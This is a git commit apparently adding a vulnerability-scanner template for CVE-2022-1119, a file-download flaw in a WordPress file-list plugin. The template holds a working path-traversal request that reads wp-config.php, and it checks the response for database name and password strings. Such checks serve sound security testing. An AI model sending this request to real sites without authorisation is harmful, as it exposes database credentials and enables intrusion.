Added CVE-2022-1119 (#4240)

patch-1
Sandeep Singh 2022-04-25 21:44:36 +05:30 committed by GitHub
parent c99e92bc73
commit 21145c1220
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2022-1119
info:
name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
author: random-robbie
severity: high
description: |
The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
classification:
cve-id: CVE-2022-1119
cwe-id: CWE-552
tags: cve,cve2022,lfi,wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200